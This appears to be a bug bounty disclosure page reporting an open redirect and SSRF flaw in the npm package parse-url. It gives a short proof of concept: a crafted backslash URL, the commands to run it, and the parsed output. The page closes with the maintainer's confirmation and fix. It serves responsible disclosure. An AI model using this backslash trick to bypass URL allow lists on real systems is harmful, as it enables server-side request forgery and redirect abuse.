Open Redirect in ionicabizau/parse-url

Valid

Reported on

Jul 8th 2021


✍️ Description

parse-url mishandles certain uses of backslash such as https:/\ and interprets the URI as a relative path. Browsers accept backslashes after the protocol, and treat it as a normal slash, while parse-url sees it as a relative path. Which will lead to SSRF attacks, open redirects, or other undesired behavior.

Similar to CVE-2021-27515, CVE-2021-27516

🕵️‍♂️ Proof of Concept

  1. Create the following PoC file:
// poc.js
var parseUrl = require("parse-url")
var u= parseUrl("https:/\/\/\github.com/foo/bar")
console.log(u)
  1. Execute the following commands in another terminal:
npm i parse-url # Install affected module
node poc.js #  Run the PoC
  1. Check the Output:
{
  protocols: [ 'https' ],
  protocol: 'https',
  port: null,
  resource: '',
  user: '',
  pathname: '/github.com/foo/bar',
  hash: '',
  search: '',
  href: 'https:///github.com/foo/bar',
  query: [Object: null prototype] {}
}

💥 Impact

Depending on library usage and attacker intent, impacts may include allow/block list bypasses, SSRF attacks, open redirects, or other undesired behavior.

Occurrences

We have contacted a member of the ionicabizau/parse-url team and are waiting to hear back a year ago
Ionică Bizău (Johnny B.) validated this vulnerability a year ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome
a year ago

Admin


@Ionica, do we have a fix for this yet, that we can confirm on the platform?

Ionică
a year ago

Maintainer


As far I know, there is no fix yet… Contributions are welcome like always and I’ll be happy to release a new version once we have a fix.

Thank you.

Ionică Bizău (Johnny B.) confirmed that a fix has been merged on 21c72a a month ago
Ionică Bizău (Johnny B.) has been awarded the fix bounty
index.js#L35 has been validated
to join this conversation